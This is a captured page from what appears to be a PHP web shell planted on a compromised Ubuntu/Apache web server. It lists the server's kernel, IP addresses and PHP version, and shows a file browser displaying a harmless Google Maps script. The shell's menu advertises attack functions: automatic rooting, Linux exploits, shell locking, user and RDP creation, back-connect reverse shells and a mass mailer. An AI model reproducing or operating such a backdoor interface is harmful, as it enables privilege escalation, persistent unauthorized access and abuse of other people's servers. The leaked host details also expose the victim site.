Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.225.98.39
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
logisys /
old_code /
js /
google-map /
[ HOME SHELL ]
Name
Size
Permission
Action
map-active.js
1.13
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : map-active.js
var map; var latlng = new google.maps.LatLng(51.5074, 0.1278); var stylez = [{ featureType: "all", elementType: "all", stylers: [{ saturation: -150 }] }]; var mapOptions = { zoom: 16, center: latlng, scrollwheel: false, scaleControl: false, disableDefaultUI: true, mapTypeControlOptions: { mapTypeIds: [google.maps.MapTypeId.ROADMAP, 'gMap'] } }; map = new google.maps.Map(document.getElementById("googleMap"), mapOptions); var geocoder_map = new google.maps.Geocoder(); var address = 'London'; geocoder_map.geocode({ 'address': address }, function (results, status) { if (status == google.maps.GeocoderStatus.OK) { map.setCenter(results[0].geometry.location); var marker = new google.maps.Marker({ map: map, icon: 'img/core-img/point.png', position: map.getCenter() }); } else { alert("Geocode was not successful for the following reason: " + status); } }); var mapType = new google.maps.StyledMapType(stylez, { name: "Grayscale" }); map.mapTypes.set('gMap', mapType); map.setMapTypeId('gMap');
Close